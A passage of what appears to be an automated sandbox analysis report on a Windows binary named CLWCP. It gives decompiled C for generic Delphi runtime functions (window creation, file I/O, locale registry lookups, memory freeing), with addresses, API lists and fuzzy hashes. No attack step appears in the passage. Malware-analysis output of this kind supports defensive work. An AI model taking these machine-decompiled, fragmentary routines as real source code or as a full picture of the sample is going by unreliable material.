				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402B3C();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402B2C(_t13);
				return _t24;
			}








                                  0x00406ac7
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad2
                                  0x00406b03
                                  0x00406b0c
                                  0x00406b18

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 4ea5385a7fb49de877cea24c14509646f54dc55b59a53c0af84918c32b27f4c7
                                  • Instruction ID: 055c523252b182479b1322842d5a616c723e48f9163be22828002068c565a500
                                  • Opcode Fuzzy Hash: 4ea5385a7fb49de877cea24c14509646f54dc55b59a53c0af84918c32b27f4c7
                                  • Instruction Fuzzy Hash: D3F07FB2700118BF9B80DE9DDD85E9B77ECEB4D264B05412ABA08E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406AC4, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406AC4(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402B3C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402B2C(_t13);
				return _t24;
			}








                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad2
                                  0x00406b03
                                  0x00406b0c
                                  0x00406b18

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: f809e8321112fef6cd52cdc8dabafa63f047bb196829bf56c09a771d002f0ff5
                                  • Instruction ID: eeef6f1da893cc1339d43a719b5e30be1e1af0b80099e00e805a3e993f65ff62
                                  • Opcode Fuzzy Hash: f809e8321112fef6cd52cdc8dabafa63f047bb196829bf56c09a771d002f0ff5
                                  • Instruction Fuzzy Hash: 32F07FB2600118AF8B80DE9DDD85E9B77ECEB4D264B05412ABA08E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00455E44, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00455E44(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t40;
				char _t41;

				_push(0);
				_t37 = __edx;
				_t27 = __eax;
				_push(_t40);
				_push(0x455ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				_t41 =  *((char*)(__eax + 0xac));
				if(_t41 == 0) {
					_t7 = _t27 + 0x8c; // 0x8c
					E00404170(_t7, __edx);
				} else {
					E00455DF8(__eax,  &_v8);
					E00404528(_v8, _t37);
					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
						SetWindowTextA( *(_t27 + 0x30), E004045DC(_t37));
						_t6 = _t27 + 0x8c; // 0x8c
						E0040411C(_t6);
					}
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00455ECD);
				return E0040411C( &_v8);
			}








                                  0x00455e47
                                  0x00455e4b
                                  0x00455e4d
                                  0x00455e51
                                  0x00455e52
                                  0x00455e57
                                  0x00455e5a
                                  0x00455e5d
                                  0x00455e64
                                  0x00455ea3
                                  0x00455eab
                                  0x00455e66
                                  0x00455e6b
                                  0x00455e75
                                  0x00455e7a
                                  0x00455e91
                                  0x00455e96
                                  0x00455e9c
                                  0x00455e9c
                                  0x00455e7a
                                  0x00455eb2
                                  0x00455eb5
                                  0x00455eb8
                                  0x00455ec5

                                  APIs
                                    • Part of subcall function 00455DF8: GetWindowTextA.USER32 ref: 00455E1B
                                  • SetWindowTextA.USER32(?,00000000), ref: 00455E91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID:
                                  • API String ID: 530164218-0
                                  • Opcode ID: a5a8a5f97e6c3099e6ffdff6fd17be931417818d28b829c888b7f72ab7cb079b
                                  • Instruction ID: 8c2c7cd305171f378c92bbe1b892341fca0d768ae13f23b865104b2b29def0f7
                                  • Opcode Fuzzy Hash: a5a8a5f97e6c3099e6ffdff6fd17be931417818d28b829c888b7f72ab7cb079b
                                  • Instruction Fuzzy Hash: 8F01A770600A04AFD711EB65C857F6A73A89B89705F918077FD00DB693DB7C9E08CA79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406B1C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406B1C(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402B3C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402B2C(_t12);
				return _t22;
			}








                                  0x00406b23
                                  0x00406b28
                                  0x00406b2a
                                  0x00406b59
                                  0x00406b62
                                  0x00406b6e

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: a32d1e2c77882705ae6a4b95879da80bfa9564b651c5175dfe47f38abb15fb0b
                                  • Instruction ID: 34761e0b611609027b409a2959eeb2aca7fe1dc47977453024b6348bbc10bbac
                                  • Opcode Fuzzy Hash: a32d1e2c77882705ae6a4b95879da80bfa9564b651c5175dfe47f38abb15fb0b
                                  • Instruction Fuzzy Hash: F4F097B2704118BFD740DE9DDD85E9B77ECEB4D264B01412ABA0CE7241D574ED1087A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441090, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00441090(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x441116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x470aa8 =  *0x470aa8 - 1;
				if( *0x470aa8 < 0) {
					 *0x470aa4 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x470aa4;
					E00440E40(_t16, __edi,  *0x470aa4);
					_t6 =  *0x430190; // 0x4301dc
					E00413560(_t6, _t16, _t17,  *0x470aa4);
					_t8 =  *0x430190; // 0x4301dc
					E00413600(_t8, _t16, _t17, _t31);
					_t21 =  *0x430190; // 0x4301dc
					_t10 =  *0x442454; // 0x4424a0
					E004135AC(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x430190; // 0x4301dc
					_t12 =  *0x441120; // 0x44116c
					E004135AC(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x430190; // 0x4301dc
					_t14 =  *0x441244; // 0x441290
					E004135AC(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x44111d);
				return 0;
			}















                                  0x00441090
                                  0x00441090
                                  0x00441095
                                  0x00441096
                                  0x0044109b
                                  0x0044109e
                                  0x004410a1
                                  0x004410a8
                                  0x004410b8
                                  0x004410b8
                                  0x004410bf
                                  0x004410c4
                                  0x004410c9
                                  0x004410ce
                                  0x004410d3
                                  0x004410d8
                                  0x004410de
                                  0x004410e3
                                  0x004410e8
                                  0x004410ee
                                  0x004410f3
                                  0x004410f8
                                  0x004410fe
                                  0x00441103
                                  0x00441103
                                  0x0044110a
                                  0x0044110d
                                  0x00441110
                                  0x00441115

                                  APIs
                                  • GetVersion.KERNEL32(00000000,00441116), ref: 004410AA
                                    • Part of subcall function 00440E40: GetCurrentProcessId.KERNEL32(?,00000000,00440FB8), ref: 00440E61
                                    • Part of subcall function 00440E40: GlobalAddAtomA.KERNEL32 ref: 00440E94
                                    • Part of subcall function 00440E40: GetCurrentThreadId.KERNEL32 ref: 00440EAF
                                    • Part of subcall function 00440E40: GlobalAddAtomA.KERNEL32 ref: 00440EE5
                                    • Part of subcall function 00440E40: RegisterClipboardFormatA.USER32 ref: 00440EFB
                                    • Part of subcall function 00440E40: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00440F7F
                                    • Part of subcall function 00440E40: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440F90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: c2cabc03203bb3823e33203204505c7b1e48f5680c0b0e354beef33ee09e1c6a
                                  • Instruction ID: b74f1cc5ab12ec1c0557040eb5c0ae4aa8e907eb6d215a0cae93aeab2dc99098
                                  • Opcode Fuzzy Hash: c2cabc03203bb3823e33203204505c7b1e48f5680c0b0e354beef33ee09e1c6a
                                  • Instruction Fuzzy Hash: CBF09674214200AFDB11FF25EC538553765F789709B900136F604C3676C63DEC91CA8C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408424, Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00408424(signed int __eax, signed int __edx) {
				signed int _t6;
				void* _t14;
				signed int _t21;

				_t6 = __eax | 0xffffffff;
				_t21 = __edx & 0x00000003;
				if(_t21 <= 2 && (__edx & 0x000000f0) <= 0x40) {
					_t14 = CreateFileA(E004045DC(__eax),  *(0x46e140 + _t21 * 4),  *(0x46e14c + ((__edx & 0x000000f0) >> 4) * 4), 0, 3, 0x80, 0); // executed
					return _t14;
				}
				return _t6;
			}






                                  0x0040842b
                                  0x00408430
                                  0x00408436
                                  0x00408472
                                  0x00000000
                                  0x00408472
                                  0x0040847a

                                  APIs
                                  • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00412020,00416106,00000000,0041617A,?,?,00412020), ref: 00408472
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: f8f76e3bace43c7003b6a07901b4df0e6026c36ac2d243b74c8cc72463cb9e46
                                  • Instruction ID: 9e4920f008fc1151ba568213443a4bc2a71d27b7ab7fac706f397d736cfc79ae
                                  • Opcode Fuzzy Hash: f8f76e3bace43c7003b6a07901b4df0e6026c36ac2d243b74c8cc72463cb9e46
                                  • Instruction Fuzzy Hash: 76E09BF274051026F23069DD9CC2F9B6189C786769F194136F554FB3D1D4BC8C019269
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004084D4, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004084D4(void* __eax, long __edx, long _a4, long _a8) {
				long _v8;
				long _v12;
				long _t15;

				_v12 = _a4;
				_v8 = _a8;
				_t15 = SetFilePointer(__eax, _v12,  &_v8, __edx); // executed
				_v12 = _t15;
				return _v12;
			}






                                  0x004084e3
                                  0x004084e9
                                  0x004084f6
                                  0x004084fb
                                  0x00408509

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,?), ref: 004084F6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 93dc9ae3820cb81673042d9f4bb93040122fbc435d1d1d4a74df4814d5fa303a
                                  • Instruction ID: df6ad577486d23821fe03ba961c4dba27dced79fa1586379a1a450d4e7dd168c
                                  • Opcode Fuzzy Hash: 93dc9ae3820cb81673042d9f4bb93040122fbc435d1d1d4a74df4814d5fa303a
                                  • Instruction Fuzzy Hash: 02E05976905218BF9B40DB98D8819DEB7FCEB48220F2081A6A958E3341E671AF509B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E6E8, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041E6E8(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;

				_t14 = __eax;
				E0041E9AC(__eax, __ecx,  *0x41e728 & 0x000000ff);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E004043DC(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E004045DC(__edx), _t9, __ecx); // executed
				return _t13;
			}






                                  0x0041e6ef
                                  0x0041e6fa
                                  0x0041e701
                                  0x0041e705
                                  0x0041e70b
                                  0x0041e71d
                                  0x0041e725

                                  APIs
                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 0041E71D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 223599850-0
                                  • Opcode ID: a9d2ac19edf858a4fbc53eb8ae38c7db87421830bb4f3e80dfc03867194868d5
                                  • Instruction ID: d5b8dda7caf6bd9b03dd8af8117e25c36796ffde2b93b61ac3d1513a6aa63cf5
                                  • Opcode Fuzzy Hash: a9d2ac19edf858a4fbc53eb8ae38c7db87421830bb4f3e80dfc03867194868d5
                                  • Instruction Fuzzy Hash: 04E04FA63102101F9750AB7E5C80967AADD8ECD224304843BB548D3243D578C8009724
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004388D8, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E004388D8(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t24;

				_v8 = __eax;
				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
				_push(_t24);
				_push(0x438925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				_t14 =  *((intOrPtr*)(_v8 + 0x188));
				_push(_t14); // executed
				L00406604(); // executed
				if(_t14 == 0) {
					E0040CAFC();
				}
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(0x43892c);
				_t16 = _v8;
				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
				return _t16;
			}








                                  0x004388dc
                                  0x004388e2
                                  0x004388ea
                                  0x004388eb
                                  0x004388f0
                                  0x004388f3
                                  0x004388f9
                                  0x004388ff
                                  0x00438900
                                  0x00438907
                                  0x00438909
                                  0x00438909
                                  0x00438910
                                  0x00438913
                                  0x00438916
                                  0x0043891b
                                  0x0043891e
                                  0x00438924

                                  APIs
                                  • 72E89840.USER32(?,00000000,00438925), ref: 00438900
                                    • Part of subcall function 0040CAFC: GetLastError.KERNEL32(0040CBAC,?,00415FF3,?), ref: 0040CAFC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: E89840ErrorLast
                                  • String ID:
                                  • API String ID: 1681082125-0
                                  • Opcode ID: 312d335a21c74f3f605cd666d2aec36ad51cf25c6cbae57883234a69e8b94a03
                                  • Instruction ID: ebd8038dcea74eafc0d3b3ca46d80d33777937119dafea280f90645ea1dad0d1
                                  • Opcode Fuzzy Hash: 312d335a21c74f3f605cd666d2aec36ad51cf25c6cbae57883234a69e8b94a03
                                  • Instruction Fuzzy Hash: A1F0A771204308EFD711CB69C941E6DB7E8EB0C704B5204BAF800D3651EA38DD00D619
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405170, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405170(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E004053D4(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                  0x00405178
                                  0x0040517e
                                  0x0040518e
                                  0x00405197
                                  0x0040519c
                                  0x0040519e
                                  0x004051a3
                                  0x004051a8
                                  0x004051a8
                                  0x004051a3
                                  0x004051b6

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040518E
                                    • Part of subcall function 004053D4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000), ref: 004053F0
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040540E
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040542C
                                    • Part of subcall function 004053D4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0040544A
                                    • Part of subcall function 004053D4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405493
                                    • Part of subcall function 004053D4: RegQueryValueExA.ADVAPI32(?,00405640,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001), ref: 004054B1
                                    • Part of subcall function 004053D4: RegCloseKey.ADVAPI32(?,004054E0,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004054D3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 092448762e68ca77ddbc996cee487d8ecb53dfa4f52a9641e8106825600ccee7
                                  • Instruction ID: e0c66f3e0a29b73bafbef0c2885c46a7d8e3f7bd6260490d64f9d9a1ac85e36c
                                  • Opcode Fuzzy Hash: 092448762e68ca77ddbc996cee487d8ecb53dfa4f52a9641e8106825600ccee7
                                  • Instruction Fuzzy Hash: 2CE06D71A046148FDB10DE68C8C1A4733E8AB08754F000AA6EC54EF386D3B8DD208BE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040847C, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0040847C(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = ReadFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                  0x0040847f
                                  0x00408490
                                  0x00408497
                                  0x00408499
                                  0x00408499
                                  0x004084a7

                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00408490
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 23b0986097739bb17f84c5b6e84c540fa1422d41cd323f2d2569a5b4f870bfc3
                                  • Instruction ID: 6ef1a873f201276505486c2b3419eeb5021042befa0cdf43492526d369c999bc
                                  • Opcode Fuzzy Hash: 23b0986097739bb17f84c5b6e84c540fa1422d41cd323f2d2569a5b4f870bfc3
                                  • Instruction Fuzzy Hash: BCD05B763181117BD220A65B5D44EA75BDCCBC5774F11063EB598C71C1D6348C0582B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004084A8, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004084A8(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                  0x004084ab
                                  0x004084bc
                                  0x004084c3
                                  0x004084c5
                                  0x004084c5
                                  0x004084d3

                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004084BC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 9ca33dfb9204591eace900fa114506e2aa6f4db29c117e66ad428c2eaa4edf8a
                                  • Instruction ID: a1e2b7924e7da223918a2db0578c5a1e1a70929bb187246dca29f7127b5cce07
                                  • Opcode Fuzzy Hash: 9ca33dfb9204591eace900fa114506e2aa6f4db29c117e66ad428c2eaa4edf8a
                                  • Instruction Fuzzy Hash: 6FD05B723081117AD220965B9D84DA76BDCCBC5770F11073EB59CC31C1D6308C018275
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401608, Relevance: 1.3, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401608(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t26;
				intOrPtr _t29;
				int _t34;
				intOrPtr* _t39;
				intOrPtr* _t46;
				void* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t49 =  &_v20;
				_v32 = __ecx;
				 *_t49 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t48 = __eax;
				_v20 =  *_t49 + __eax;
				_t39 =  *0x4705e8; // 0x4705e8
				while(_t39 != 0x4705e8) {
					_t46 =  *_t39;
					_t5 = _t39 + 8; // 0x0
					_t47 =  *_t5;
					if(_t48 <= _t47) {
						_t6 = _t39 + 0xc; // 0x0
						if(_t47 +  *_t6 <= _v20) {
							if(_t47 < _v28) {
								_v28 = _t47;
							}
							_t10 = _t39 + 0xc; // 0x0
							if(_t47 +  *_t10 > _v24) {
								_t12 = _t39 + 8; // 0x0
								_t13 = _t39 + 0xc; // 0x0
								_v24 =  *_t12 +  *_t13;
							}
							_t34 = VirtualFree(_t47, 0, 0x8000); // executed
							if(_t34 == 0) {
								 *0x4705c4 = 1;
							}
							E00401410(_t39);
						}
					}
					_t39 = _t46;
				}
				_t26 = _v32;
				 *_t26 = 0;
				if(_v24 == 0) {
					return _t26;
				}
				 *_v32 = _v28;
				_t29 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t29;
				return _t29;
			}















                                  0x0040160c
                                  0x0040160f
                                  0x00401613
                                  0x00401616
                                  0x00401620
                                  0x00401624
                                  0x0040162b
                                  0x0040162f
                                  0x0040168e
                                  0x00401637
                                  0x00401639
                                  0x00401639
                                  0x0040163e
                                  0x00401642
                                  0x00401649
                                  0x0040164f
                                  0x00401651
                                  0x00401651
                                  0x00401657
                                  0x0040165e
                                  0x00401660
                                  0x00401663
                                  0x00401666
                                  0x00401666
                                  0x00401672
